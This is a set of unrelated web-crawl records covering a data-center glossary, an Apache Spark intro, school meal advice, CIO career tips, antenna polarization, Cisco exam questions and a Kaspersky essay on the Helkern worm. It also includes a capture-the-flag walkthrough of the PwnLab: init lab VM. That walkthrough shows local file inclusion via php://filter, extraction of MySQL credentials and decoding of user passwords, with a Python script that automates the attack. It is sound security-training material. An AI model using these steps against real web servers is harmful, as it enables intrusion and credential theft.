Not pronounced like the reaction to a bad odor, but one letter at a time. Power Usage Effectiveness is one of two reciprocal metrics embraced by The Green Grid industry consortium; the other is Data Center Infrastructure Efficiency (DCiE, above). PUE is the ratio of the total power going into a data center to the power used by the center's IT equipment. For example, a PUE of 2 means that half of the power used by the data center is going to the IT equipment and the other half is going to the center's power and cooling infrastructure. Experts recommend a PUE of less than 2. The closer a PUE is to 1, the better.
11. REC
Pronounced like the short version of the word recreation, this acronym means renewable energy certificates or renewable energy credits. RECs are tradable commodities that show that 1 megawatt-hour of electricity was purchased from a renewable source, such as solar, wind, biomass or geothermal. An increasing number of companies are buying RECs to offset the amount of electricity generated from fossil fuels that their data centers consume.
12. UPS
We're not talking about the boys in brown, although the acronym is pronounced the same way. We're talking about uninterruptible power supply, which provides battery backup if a data center's power fails. It's essential that UPS equipment be energy efficient, because it consumes as much as 18% of the power in a typical data center.
Learn more about this topic: Energy-efficiency self-assessment tool (02/18/08); Two ways to measure power consumption (02/18/08); Where to turn for advice about power
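Because PUE and DCiE, as defined above, are just a ratio and its reciprocal, they are easy to sanity-check in a few lines of code. The figures below are invented for illustration, not measurements from any real facility.

```python
def pue(total_facility_kw: float, it_load_kw: float) -> float:
    """Power Usage Effectiveness: total facility power / IT equipment power."""
    return total_facility_kw / it_load_kw

def dcie(total_facility_kw: float, it_load_kw: float) -> float:
    """Data Center Infrastructure Efficiency: IT power as a % of total power."""
    return 100.0 * it_load_kw / total_facility_kw

# Hypothetical data center drawing 1000 kW, of which 500 kW reaches the IT gear.
total_kw, it_kw = 1000.0, 500.0
print(f"PUE  = {pue(total_kw, it_kw):.2f}")    # 2.00 -> half the power feeds IT
print(f"DCiE = {dcie(total_kw, it_kw):.1f}%")  # 50.0% -> the reciprocal view
```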
<urn:uuid:6be2a613-a554-4405-a1d1-09251fd265fd>
CC-MAIN-2017-09
http://www.networkworld.com/article/2283259/data-center/data-center-power-glossary.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170875.20/warc/CC-MAIN-20170219104610-00454-ip-10-171-10-108.ec2.internal.warc.gz
en
0.937866
1,149
3.078125
3
Apache Spark - an open source project - is an application framework for doing highly iterative analysis that scales to large volumes of data. Through its powerful engine and tooling, Apache Spark significantly lowers the barrier to entry for building analytics applications. This brief introduces the Apache Spark platform and explains how it can be used to create analytics applications based on machine learning.
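As a rough illustration of how low that barrier can be, the sketch below trains a simple classifier with PySpark's DataFrame and ML APIs. The input file, column names and schema are hypothetical and stand in for whatever data the application actually analyzes.

```python
from pyspark.sql import SparkSession
from pyspark.ml.feature import VectorAssembler
from pyspark.ml.classification import LogisticRegression

# Start (or reuse) a Spark session.
spark = SparkSession.builder.appName("analytics-demo").getOrCreate()

# Hypothetical dataset: numeric usage features plus a 0/1 label column.
df = spark.read.csv("customers.csv", header=True, inferSchema=True)

# Spark ML expects the features packed into a single vector column.
assembler = VectorAssembler(
    inputCols=["tenure_months", "monthly_spend", "support_tickets"],
    outputCol="features",
)
train = assembler.transform(df)

# Fit the model; Spark distributes the iterative optimization across the cluster.
model = LogisticRegression(featuresCol="features", labelCol="churned").fit(train)
print("Coefficients:", model.coefficients)

spark.stop()
```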
<urn:uuid:8d214dc6-9cdb-460d-bf7b-f5dc9db49d63>
CC-MAIN-2017-09
http://www.idgconnect.com/view_abstract/35014/the-next-wave-intelligent-applications-powered-apache-spark
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00450-ip-10-171-10-108.ec2.internal.warc.gz
en
0.86618
105
2.625
3
Welcome back everyone! This is the first in a new series we’re launching that will walk you through various capture the flag (CTF) challenges. In order to ease into this new series we’re going to take a minute now to detail what a CTF challenge is (for those of you that don’t already know). Then, we’ll get hacking at the PwnLab: init CTF challenge. So, let’s get started! What is a CTF Challenge? Simply put, a CTF challenge is a system that has been intentionally configured with vulnerable software for the sole purpose of hacking. When hacking a CTF the “player” (attacker) must find and exploit these vulnerabilities in order to gain access to a text file containing the flag. Once the flag has been read, the game is won! You may be wondering how this helps us become better hackers. Well, my direct answer to that question is: practice makes perfect! If we really take the time to play these CTF challenges, we become exposed to a far wider range of attacks than we’d normally see. By seeing and using these attacks ourselves, we gain a better understanding of how they work, which in turn makes us better hackers. Now that we know what a CTF is and the perks gained from playing them, let’s get started at hacking our first CTF challenge! Hacking the PwnLab: init CTF The first CTF challenge we’ll be taking a crack at is PwnLab: init. This is meant to be a relatively easy CTF to complete, so it’s a perfect candidate to start us out! When we download PwnLab, it comes as a VM, so we can run it inside VirtualBox, which is what we’ll be doing here. This CTF can get a bit lengthy, so we’re going to split the pwnage up into two parts. This part will be reconnaissance and preparing the attack, and the next part will be exploitation and privilege escalation. Let’s get hacking! Step 1: Finding the Target If we’re going to hack PwnLab, we need to know it’s address! Since PwnLab is configured to automatically pull an IP address via DHCP, we need to have a scan running in order to see it’s address. So, we’ll start the scan, then we’ll start the PwnLab VM and we’ll have the address. We’ll be hacking PwnLab from BackTrack, so we’ll be using netdiscover. First we need to find the address range to use in netdiscover. We can use the ifconfig command for this: We can see that our address is 10.130.10.18 with a subnet mask of 255.255.255.0. By representing this information is CIDR notation, we can deduce that we need to scan for the 10.130.10.0/24 range of IP addresses. The netdiscover tool has a lot of output, so I’ve typed the command out as well. Now that we have our scan ready, let’s execute it. We’ll need to give it a second to gather results, then we’ll start our VM. Once we do, we should see a new host appear in the scan results: We can see at the end of our netdiscover output that we have the IP address of out target, 10.130.10.41. Now that we have this address, we can do some recon on the target. Step 2: Performing a Port Scan with Nmap In order to find potential vulnerabilities on our target, we need to know what ports are open, and what services are listening on those ports. To find this oh-so-valuable information, we’ll be performing a port scan using nmap. Let’s see the command and the output, then we’ll discuss what’s happening under the hood: We can see that we’ve not only used nmap, but we’ve given a variety of flags and switches to customize our scan. We’ve disabled host checking (-Pn), enabled SYN scanning (-sS), and enabled service detection (-sV). 
We’ve also specified that we only want to scan ports 1 through 4000. Then, we pipe the output into a new text file named nmap.txt. This is so that we can look at the scan results again at any time without having to re-scan the target. We can see by the result of our scan that PwnLab is hosting a MySQL database and some sort of website. The database may contain some sweet goodies, but I think we’ll take a look at this web server being hosted on port 80 first. Step 3: Analyzing the Web App for Vulnerabilities Since we know that there’s a web app being hosted on PwnLab, we’re going to see if we can find any vulnerabilities to exploit. We’re going to start by pointing our browser to PwnLab’s IP address. Once we do, we should be greeted with a home page like this: Nothing particularly stands out on the home page, so let’s move to the login page and see if anything sticks out to us: When we move to the login page, we can see the URI change as a new resource is selected. After some research I found that there’s a local file inclusion vulnerability in this sort of resource selection. Local file inclusion (LFI) can help us read files that we otherwise shouldn’t be able to read. In this case, we can use it to read the source code of the PHP scripts that run the web app. We’ll have to use a variant of LFI that uses built-in PHP converters to convert the source code to base64 so we can decode and read it. Step 4: Retrieving and Reviewing the Login PHP Script Source Code In order to exploit this LFI vulnerability, we simply need to modify the URI and point the base64 converter to the login.php resource. Once we do, we should see a result such as this: There we go! We successfully exploited LFI. Now we need to retrieve this base64 string and decode it to get the login PHP script source code. We can download the base64 string by re-using the current URL and feeding it to the curl command, we’re also going to save the output to a file named tmp.txt. Let’s do that now: Now, the curl command will also save the rest of the source code for the webpage, so we need to open a text editor and remove the HTML tags so we have nothing but the base64 string left; I’ll leave that to you. Now that we have our base64 string in a text file, we can decode it and delete our temp. file. Let’s decode the base64 now: We’ve decoded the base64 and stored the output in a new text file. We then delete our temporary file as we no longer need it. Now that we have the login page source code, let’s take a look at it: Step 5: Retrieving and Viewing the Config PHP Source Code We can see here at the very beginning of the login PHP source code, it required code from another resource named config.php. Since the LFI worked for the login PHP script, it should work for the config PHP script as well. I’m not going to go through the whole process again, as it’s the exact same steps we took before. I will however post a screenshot with all the steps. Let’s download and decode the config.php source code: Now that we have the config.php source, we can see what PwnLab is trying to hide from us: Aha! We found a username and a password inside the config.php source code. I’m willing to bet that these are the credentials we need to log into the MySQL database we saw earlier! Step 6: Log into and Explore the MySQL Database Now that we have the creds to get into the MySQL database, we can log in and see what goodies they’re trying to keep from us. We can use the default MySQL client installed on BackTrack to log into and explore the MySQL database. 
Once we give all the info to our client, we should be prompted with a password, and once we enter the password, we should be given a MySQL prompt. Let’s log into the database now: There we go! Our stolen credentials checked out and now we have access to the database. Now we can use the show and use commands in order to find and select a database, and show the tables inside that database. Let’s start by looking for databases with the show command: When we execute our show command, we are returned with a single database under the name Users. This must be where they keep all the user passwords! Let’s utilize the use command in order to select this database, then we’ll use the select command to extract all the data from it: Once we extracted all entries from the users table we were given a table of usernames and passwords. But, it seems that the passwords are encoded with base64. But, that’s not a problem for determined attackers like us! Step 7: Retrieve and Decode the Credentials I’ve made a new file named users.txt and have stored the usernames and passwords in it. We can now go through and use the echo command along with the base64 command in order to decode each of these passwords. We’ll start by decoding kent’s password: Now we just have to repeat this process for the other two usernames and we end up with credentials that look like this: Now that we have credentials, we may be able to cause more havoc in the web app we used earlier! But, we’ll save that for the next part, as we’ve done more than enough damage here. Today we covered and demonstrated the concept of LFI and basic data extraction with native tools. In the next part, we’ll use these newly found credentials to gain access to the functionality of the web app, and thus the PwnLab server. We’ll then perform some privilege escalation and capture that flag!
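For readers who prefer scripting the LFI steps above rather than juggling curl and a text editor, here is a rough Python sketch that pulls a PHP source file through the php://filter wrapper and decodes it in one go. It assumes the vulnerable query parameter is named page, which is an assumption on my part rather than something shown in the walkthrough, so adjust it to whatever appears in the URL of your own lab instance.

```python
import base64
import re
import requests

TARGET = "http://10.130.10.41"   # PwnLab's address from the netdiscover scan
PARAM = "page"                   # assumed name of the vulnerable parameter

def dump_php_source(resource: str) -> str:
    """Fetch a PHP resource through the base64 filter and return its source."""
    filt = f"php://filter/convert.base64-encode/resource={resource}"
    resp = requests.get(f"{TARGET}/", params={PARAM: filt}, timeout=10)
    # The base64 payload is embedded in the page HTML; take the longest run.
    blobs = re.findall(r"[A-Za-z0-9+/=]{40,}", resp.text)
    if not blobs:
        raise ValueError(f"no base64 payload found for {resource}")
    return base64.b64decode(max(blobs, key=len)).decode(errors="replace")

for name in ("login", "config"):
    print(f"----- {name} -----")
    print(dump_php_source(name))
```

The same base64.b64decode() call also handles the credential strings pulled out of the MySQL users table, so the whole extraction step can be automated once the database password is known.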
<urn:uuid:a18d50a1-8e4c-4dc2-9d5a-026025269a55>
CC-MAIN-2017-09
https://www.hackingloops.com/category/password-hacking/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00450-ip-10-171-10-108.ec2.internal.warc.gz
en
0.908455
2,228
2.796875
3
Parents: Learn About Your School Meal Program
How do I find out what is being served in my child's school cafeteria?
Review the cafeteria menu with your child. Menus often list alternate choices, such as entrée salads and sandwiches, available to students who don't care for the daily special. Ask your child about the fruit and vegetable choices offered alongside each meal and encourage them to try new menu items. Visit your school district website for more details. Many school nutrition departments have a web page listing ingredients, nutritional facts, allergen information and more. Have lunch with your child in the school cafeteria. Check with the principal or cafeteria manager first regarding visitor policies. See for yourself how school meals look, smell and taste. Be sure to ask questions about how the food was prepared—you may be surprised to learn that many of the traditional favorites are now made with whole grains, less fat and sodium.
Who should I contact with questions/concerns about the school cafeteria menu?
For information about menu items, contact the school cafeteria manager, who can discuss everything from meal preparation methods to waiting time in line. For more detailed questions, the cafeteria manager may refer you to the nutrition director who oversees cafeteria operations, procurement and menu planning for the entire school district. In most cases, the cafeteria manager and nutrition director do not manage vending machines or snack bars located outside the cafeteria. Contact your school principal for more information on these food choices. The principal can also address concerns about the lunch period schedule. Don't forget to ask your teacher about classroom policies regarding food rewards and items served during classroom parties.
How can I get involved in my child's school meal program?
Ask the cafeteria manager and principal about volunteer opportunities in your school cafeteria or school garden. Some schools request parent volunteers to help usher students through the lunch line and encourage them to try their fruits and vegetables. Many school districts have a wellness committee comprised of community volunteers to help establish and update district nutrition and physical activity policies. These local wellness policies can impact everything from the choices available in vending machines to the amount of time each week for PE. Organize a National Take Your Parents to Lunch Day event at your school. Each October, as part of National School Lunch Week, SNA teams up with KIWI magazine to encourage parents to join their children for lunch in the cafeteria. The event offers a great opportunity for parents to find out more and talk with their school nutrition professionals about the choices available with school lunch. For tools and information, visit http://www.kiwimagonline.com/lunchday
My child has food allergies. Do school cafeterias accommodate special dietary requirements such as gluten or nut free?
If your student has a life-threatening food allergy, it is important to build a team of key individuals at school who can help safely manage your child's needs. Start by contacting your school nurse before the first day of school to discuss implementing an allergy action plan. The school nurse can work with parents and health care providers to develop a health care plan to meet the unique needs of each student.
The school nurse can also assist with outreach to teachers, coaches, school nutrition, transportation and maintenance staff and others to discuss dietary restrictions and methods for safely managing your child’s food allergy at school. School cafeterias must provide food substitutions for students whose food allergies constitute a “disability.” The student must provide a statement, signed by a licensed physician, which identifies the disability, explains why the disability restricts the child’s diet, and lists the foods to be omitted from the child’s diet and recommendations for alternate foods. Click here or more information. Even if your child’s food allergy does not constitute a “disability,” contact your school cafeteria manager to discuss the school menu and safe food choices available for your child. Your cafeteria might offer alternate choices that are not listed on the monthly menu.
<urn:uuid:b20f6c73-c6cb-4a02-a264-d915bfd3d4c3>
CC-MAIN-2017-09
http://sna.dev.networkats.com/AboutSchoolMeals/Parents/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00502-ip-10-171-10-108.ec2.internal.warc.gz
en
0.945086
801
2.53125
3
It pays to stay ahead of the curve, but how, short of peering into a crystal ball, can you successfully predict what is coming next in the ever-changing fast-paced world of technology? One of the surest ways to detect what technologies are coming next is to go directly to the R&D hubs. Regular visits to technology transfer offices at universities, labs and government offices will give you an early heads-up. Of course, those visits can often be virtual rather than physical as long as you know where to look. 1. Federal labs are a good place to look for new technology developments since they receive the most R&D funding by the government. Try using the search engine at www.federallabs.org to see what's out there. 2. Use the search engine at www.uspto.gov to see what technologies have recently been patented and what prior art has been referenced. You will get a name and citation that may be helpful 3. Conduct a technical literature search through your industry professional association or your local technical library. 4. Research the "think tanks" in our nation. "I like Battelle since they produce a list annually of the 'hot' technologies," said Beeson. 5. Check out the PDMA, a new product development and management association that seems to have a pulse on what's happening. 6. Review the technology "matching" websites like www.yet2.com. 7. See the Licensing Executives Society International, the professional organization for licensing and their matching technology website within their members site. "It takes some time to investigate all the above" said Beeson, but the leadership and competitive advantage such early information brings is well worth the exercise. However, a wily-nilly foray into the interesting world of R&D can also result in confusion or distraction. To avoid this problem, it is important to predetermine which lines of technologies are likely to impact your organization and which are merely interesting to you personally. "I do my best to keep up with NASA's emerging technologies, of which there are obviously many," said Linda Cureton, NASA's CIO. "But I am more focused on keeping my fingers on the pulse of IT-specific technology." Cureton "reads a lot" to keep up with the latest trends and news. She also gets information from her staff, including the many CIOs at the NASA Centers. "Some of our most cutting edge IT efforts can be found incubating at the centers. Under my watch, I'd like to see us to a better job of making sure those best projects and practices percolate to the top and get shared across the Agency." Indeed, pushing technology throughout your organization is as much a leadership requirement as staying abreast of developments. And, sometimes the technology you most need to push comes from within. "There are heroes at our centers whose IT innovations need to be tapped across the agency," said Cureton. "We have our CIOs and many staff showcasing their efforts to spread knowledge across our IT organization." It is important not to get myopic with internal technologies and remember to look up and out, too. While Cureton's meetings and summits include internal technology showcases, "perspectives from public- and private-sector IT leaders such as President Obama appointee Vivek Kundra, the U.S.'s CIO, and Google's Vint Cerf" are also regular parts of the program. It is also important to recognize that IT isn't a solo gig anymore. 
"Leaders today who are facing extremely difficult problems with complex solutions need more than their individual heroics to prevail," said Cureton. "I stay up at night figuring out how to best tap into a high-performing team of senior leaders who have a group focus, shared direction, and who know how to harness their collective strength to solve their most difficult problems." While many heads are certainly better than one, any group can be caught in circular thinking just as easily as any individual can. The search for "what's next" must continue on a daily basis. So where else can you look for clues? "Identify the venture capitalists that fund the technology you need to hear about, e.g., B2B or B2C, and follow their blogs to see who they're funding," suggested Phil Michaelson creator of KartMe, a Web organizer that quickly became an Apple staff pick. There are also a number of places a little closer to home such as lunches with peers from other companies where you can look for signs of change in the tech landscape. Rich Morrow, principal engineer at quicloud, a tech firm that consults SMBs on how to securely architect, deploy, and maintain apps in the cloud, said he likes a good mix in learning avenues to help him stay abreast of tech changes. Here's how he does it: 1. Topping his list are "Popular Today" site aggregators such as http://popurls.com . "I read it every day, especially the Lifehacker and DZone sections," he said. "I'm not going to admit to clicking anything about lolcats." 2. A trip to a brick and mortar bookstore also ranks high on his to-do list. "Once a month, I'll peruse the book and magazine rack at Borders and read up on cool, interesting tech for five to six hours over a coffee & lunch." 3. Face-to-face meetups are a necessity too. "I attend about five to six meetups per month about topics that interest me or my clients ... nothing like meeting pros who can talk with you about their personal experiences with technology." 4. Social media also provides a daily dose of what's new. "Twitter Lists especially are very useful. If I find a new technology or company doing something cool, I check to see where they are listed and browse all their competitors." 5. Search engines such as Google can also provide quick clues. "If I find two to three players in a given area, I just punch their names into Google and see who else is in the space. Sometimes, I find an even better technology or company." 6. Real world friends are also invaluable sources. "I foster long-lasting relationships with folks who are experts in areas I'm not. When something crosses my radar that looks to be in their expertise, I'll often just IM or call them to ask their opinion about it." Perhaps the most interesting finding in this poll of where to look to find what tech or trends are coming next was the total absence of any mention to follow the technology giants. Indeed, there were several strident warnings to steer clear of tech leaders in any given space. "My No.1 recommendation would be to not listen to where the major technology companies are trying to take things," warned Babak Pasdar, president and CEO of Bat Blue, the official WiFi provider for ESPN's X Games. "The big organizations are where good ideas go to die." 
A prolific and versatile writer, Pam Baker's published credits include numerous articles in leading publications including, but not limited to: Institutional Investor magazine, CIO.com, NetworkWorld, ComputerWorld, IT World, Linux World, Internet News, E-Commerce Times, LinuxInsider, CIO Today Magazine, NPTech News (nonprofits), MedTech Journal, I Six Sigma magazine, Computer Sweden, NY Times, and Knight-Ridder/McClatchy newspapers. She has also authored several analytical studies on technology and eight books. Baker also wrote and produced an award-winning documentary on paper-making. She is a member of the National Press Club (NPC), Society of Professional Journalists (SPJ), and the Internet Press Guild (IPG).
<urn:uuid:d6bdc4b8-6a09-4ecd-8fd5-cb70143994df>
CC-MAIN-2017-09
http://www.cioupdate.com/career/article.php/3909441/Staying-Ahead-of-the-CIO-Career-Curve.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171807.25/warc/CC-MAIN-20170219104611-00026-ip-10-171-10-108.ec2.internal.warc.gz
en
0.969794
1,616
2.609375
3
* This is part one of a two-part whitepaper on antenna polarizations. If you already have a good understanding of the different types of antenna polarizations, skip to part two.
The simplest way to describe polarization is as the direction in which the electric field of a radio wave oscillates while it propagates through a medium. The point of reference for specifying a polarization is the transmitter of the signal: this can be visualized by imagining standing directly behind a radio antenna and looking in the direction it is aimed. In the case of horizontal polarization, the electric field moves sideways in a horizontal plane. Conversely, for vertical polarization, the electric field oscillates up and down in a vertical plane. Linear polarization refers to an antenna system that operates with horizontal and vertical polarizations. Image 1 shows horizontal (H) and vertical (V) polarizations.
Image 1: Linear Polarization (Horizontal and Vertical)
The two polarizations shown in image 1 are considered orthogonal to each other. Orthogonality allows a given polarization of an antenna to receive only on its intended polarization, isolated from the orthogonal polarization, thus avoiding interference from energy on the orthogonal polarization. This is the case even if the two orthogonal polarizations are operating within the same frequency/channel.
In a slant polarization antenna, rather than horizontal and vertical, the polarization is at -45 degrees and +45 degrees from a reference plane of 0 degrees. Although this is really just another form of linear polarization, the term linear is generally accepted to refer to H/V polarization antennas only. Taking the same analogy of standing behind the radio and looking in the direction of the signal, slant polarization is equivalent to taking a linear polarization radio and rotating it 45 degrees. This is shown in image 2.
Image 2: Slant Polarization (+45°/-45°)
It is possible to transmit a signal whose polarization appears to rotate while the signal travels from the transmitter to the receiver. This is referred to as circular polarization (CP). The two directions in which the signal can rotate are expressed as either Right Hand Circular Polarization (RHCP) or Left Hand Circular Polarization (LHCP). Image 3 shows a right hand circular polarization signal being transmitted, i.e. it appears to rotate to the right when observed in the direction of transmission.
Image 3: Circular Polarization (RHCP)
A CP signal consists of two orthogonal waves that are out of phase. A single wavelength is shown in the image below.
Image 4: 2D view of a single wavelength
A full wavelength is expressed as 360°, which should not be confused with the rotation of the CP signal in three-dimensional space. The phase shift that produces a CP signal is 90°, which equals a one-quarter wavelength offset, as shown in image 5 in a 2D side view of two phase-shifted radio waves.
Image 5: 2D view of two phase shifted waves
In three-dimensional space, the effect this produces appears as a rotating signal, in either a left-hand or a right-hand direction depending on which way the 90° phase shift occurs, i.e. whether H is ahead of V by 90° or vice versa. While the two waves remain linear in nature and orthogonal throughout the transmission, the electrical vector of the wave rotates through a full revolution in a single wavelength. This is shown in image 6.
Image 6: Circular Polarization Electrical Vector
See part two
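Before moving on to part two, the rotating-vector behaviour described above is easy to verify numerically: two equal-amplitude orthogonal components that are 90° out of phase produce a resultant whose magnitude never changes while its angle sweeps through a full revolution each wavelength. The sketch below uses an arbitrary example frequency and unit amplitude, not values tied to any particular product.

```python
import numpy as np

freq = 5.8e9                          # example frequency in Hz (arbitrary choice)
omega = 2 * np.pi * freq
t = np.linspace(0, 1 / freq, 400)     # one full period, i.e. one wavelength in time

e_h = np.cos(omega * t)               # horizontal component
e_v = np.sin(omega * t)               # vertical component, 90 degrees behind

magnitude = np.hypot(e_h, e_v)        # length of the resultant electric vector
angle_deg = np.degrees(np.unwrap(np.arctan2(e_v, e_h)))

print("magnitude stays constant:", bool(np.allclose(magnitude, 1.0)))
print("rotation over one period: %.1f degrees" % (angle_deg[-1] - angle_deg[0]))
# Expected: True, and approximately 360 degrees of rotation.
```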
<urn:uuid:5354ce81-fbc1-4580-9636-91ad21876120>
CC-MAIN-2017-09
http://www.mimosa.co/technology/white-papers/antenna-polarization
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00202-ip-10-171-10-108.ec2.internal.warc.gz
en
0.90633
732
3.796875
4
Which three statements are true about the operation of a full-duplex Ethernet network? (Choose three.)
Which OSI layer header contains the address of a destination host that is on another network?
DRAG DROP: Move the protocols on the left to the TCP/IP layer on the right to show the proper encapsulation for an email message sent by a host on a LAN.
Which layer of the TCP/IP stack combines the OSI model physical and data link layers?
Which protocol uses a connection-oriented service to deliver files between end systems?
Refer to the exhibit. If the hubs in the graphic were replaced by switches, what would be virtually eliminated?
Refer to the exhibit. If host A sends an IP packet to host B, what will the source physical address be in the frame when it reaches host B?
Refer to the exhibit. Host X is transferring a file to the FTP server. Point A represents the frame as it goes toward the Toronto router. What will the Layer 2 destination address be at this point?
Which network device functions only at Layer 1 of the OSI model?
Refer to the exhibit. The host in Kiev sends a request for an HTML document to the server in Minsk. What will be the source IP address of the packet as it leaves the Kiev router?
<urn:uuid:16f3b7a9-d985-49f0-a3aa-348b06534445>
CC-MAIN-2017-09
http://www.aiotestking.com/cisco/category/exam-100-101-cisco-interconnecting-cisco-networking-devices-part-1-icnd-update-may-22th-2016/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00378-ip-10-171-10-108.ec2.internal.warc.gz
en
0.909526
271
3.140625
3
Old Tools Still Work
Open source is the child of the Internet. Contrary to common wisdom, open source has been around since the 1950s, but open source, as we think of it, couldn't exist without the Internet. The Net provides the communications infrastructure for groups of remote people to work together on common projects. By the early 1990s, the first open-source developers were starting to gather. The collaboration "tools" they used included e-mail mailing lists and Usenet newsgroups. To track bugs, share code and maintain version control, they relied on file transfer protocol (ftp) servers. Many open-source groups still use those same tools and approach, and for good reason: They work. You can use those methods yourself. Any full-service Internet server package, such as a Linux server edition, BSD/OS or Windows 2000 Small Business Server, gives you all the software you need for the basics. When you're on a tight programming budget, that might be all you need. But it is, to be honest, a painful way to develop software. However, not all open-source projects made use of all of those tools. You might be surprised to know that to this day, Torvalds and the core Linux crew don't use Concurrent Versions System (CVS) or any other form of version-control software.
<urn:uuid:2f2c3741-ab53-4788-bc51-20cf4ff97737>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Linux-and-Open-Source/Its-Tool-Time/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170380.12/warc/CC-MAIN-20170219104610-00146-ip-10-171-10-108.ec2.internal.warc.gz
en
0.925376
282
2.859375
3
"Helkern" - The Beginning of End As Anti-virus Experts Have Long Warned 27 Jan 2003 Kaspersky Lab analyzes the consequences of the latest epidemic The 'Helkern' epidemic has become huge, not only in the number of infected severs (nearly 80,000), geographic coverage and its rate of spreading, but also in the consequences it has caused regarding the general functioning of the Internet. Never before has a malicious program threatened to tear apart the composite parts of the worldwide network and destroy communications between regions. 'Helkern' has managed to: disrupt the operation of and temporarily shutdown the Internet installations in the U.S., South Korea, Australia and New Zealand. According to Kaspersky Lab, 'Helkern', at the peak of the epidemic (January 25, 2003), slowed the Internet's performance by 25%. This means that every 4th site was either unable to respond or was under duress. Similarly manifestations were seen in other services using the Internet, such as email, FTP servers, Internet messaging among others. Is 'Helkern' an isolated event or unpremeditated attack? Or is it the next step for cyber-terrorists exposing network weaknesses that model the collapse of the Internet? What consequences will result from this epidemic have on the future of the Internet? These questions raise concerns for everyone who is in some way exposed to the Internet. It is essential to understand the real danger posed by 'Helkern'. It attacks only servers; so many Internet users may feel that safe as if a computer does not have the database management system Microsoft SQL Server installed, the worm is unable to inflict damage. However, the scale at which 'Helkern' spreads and the consequence of exponential rises in Internet traffic could lead to an Internet outage. Therefore, all Internet users are at the least indirectly made to suffer. The future of the Internet is not only put in jeopardy just by 'Helkern' but by the application of technologies that can in a flash slowdown networks. More than likely, very soon, just after the source code of this worm appears in sites and forums dedicated to computer viruses, the computer underground will set to the task of cloning 'Helkern'. New modifications will be created that will distinguish themselves with even greater spreading capabilities and destructive payloads. The consequences of this developing event and the potential damages to the world economy are practically beyond placing a value. The 'Helkern' attack demonstrates the general vulnerability of the Internet. It graphically demonstrates one of the weakest points through which it is possible to, on the whole, halt network operation, namely, vulnerabilities (breaches) in security systems that viruses can unimpeded exploit to penetrate computers. It would be hard to find a better example of this danger than with the current circumstances involving 'Helkern'. It is well known that the 100% protection of software does not exist. Each day up to 10 vulnerabilities are discovered in a myriad of operating systems and applications, for which their creators quickly release patches. Weak system kernels, as is often the case, is an unavoidable human factor. Making matters worse is that many system administrators infrequently install these patches, leaving their networks open to potential attack from new malicious programs. The 'Helkern' experience has shown just how 'productively' it is possible to take advantage of these shortcomings. 
The main threat lies in the fact that nothing can stop virus writers from continuing to create network worms targeting software vulnerabilities. Pandora's Box is open, and already there is nothing that can be done to rein in its destructive power. At the same time, the number of software vulnerabilities existing today is enough for the release of 'Helkernesque' worms each and every day for several years. Under such circumstances the Internet would fail as a means for business communications, entertainment or information searches. The danger posed by the abuse of software vulnerabilities was foreseen by Kaspersky Lab experts several years ago with the appearance of the first 'stealth' worms ('BubbleBoy' and 'KakWorm'), which penetrated computers via security system vulnerabilities. Until recently this information remained with a narrow circle of specialists who intentionally did not leak it to the public for fear of instigating a catastrophe. However, in August 2001 Nicholas Weaver of the University of California, Berkeley, published research analyzing the technologies used to create the worm 'Warhol' (a.k.a. 'Flash-worm'), which could manage to spread around the entire world in just fifteen minutes. For this very reason the worm was given its moniker, as it was Andy Warhol who coined the phrase, 'In the future everybody will have 15 minutes of fame'. Today, this idea has been realized, and thus we can observe how virus authors have taken it to heart. This provokes the question of whether or not 'Helkern' was created to 'test the water' of the Internet in order to detect weak spots, only to later follow up with a full-scale attack. We are far from conspiracy theories, however; most likely this is just the usual cyber hooliganism. Hooliganism in terms of approach, but when considering results - it is indeed terrorism. Usually the scale of the consequences differentiates these two terms. In this specific case, where there has been a deliberate attack on and violation of global communication systems, it is possible to classify it as a cyber-terrorist act. In our opinion, without urgent preventive and prophylactic measures this situation might in the near future go out of control and even cause us to question the Internet's existence. However, under current conditions it is almost impossible to dramatically alter how we approach preventative measures. An effective system aimed at virus epidemic detection and prevention cannot rely on today's standards of identifying Internet users, which are now basically chaotic. When such an epidemic occurs it is almost impossible to locate its epicenter - with the exception of when the virus author by mistake gives himself away. In the event of the wide spread of a malicious program, entire regions of the network must be disconnected and switched off in order to prevent it from spreading further. These measures are meaningless: you can endlessly patch the holes in a security system, but this won't prevent further attacks. Basically, today we are fixing consequences rather than causes - while at the moment the sheer volume of 'consequences' or symptoms has already reached such a level that it would be cheaper, faster and in the end more efficient to cure the problem at its roots. As was mentioned earlier, the reason it is so difficult to prevent virus attacks is Internet anarchy. It is much more tempting to abuse the network when one is sure he or she can't be tracked.
On the other hand, to reform the Internet in order to fix this problem (to introduce personal IDs) appears to be almost impossible, as this process is confronted with extremely complex political and economic problems at an international level. The only possible and realistic solution would be if large multinational corporations - the 'locomotives' of the modern economy - develop a parallel network where they concentrate all their business communications and limit this network's exposure to the Internet; doing this will allow the processing of new standards to happen faster and less painfully. To summarize, we must note that virus epidemics on the scale of 'Helkern' will happen again and that the frequency of such epidemics will most likely only increase. Eventually, using the Internet will become so inconvenient, with constant interruptions and malfunctions at the hands of viruses and hacker attacks, that users will be forced to switch to other means of communication. Naturally, 'snail mail' and telephone communications do not offer the kinds of conveniences that the Internet does. Therefore the development of a parallel network that offers a high level of reliability and security is today a matter of high priority.
<urn:uuid:e7b22a08-7175-4337-b4c3-69e1013a054a>
CC-MAIN-2017-09
http://www.kaspersky.com/au/about/news/virus/2003/_Helkern_The_Beginning_of_End_As_Anti_virus_Experts_Have_Long_Warned
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00322-ip-10-171-10-108.ec2.internal.warc.gz
en
0.953749
1,594
2.890625
3
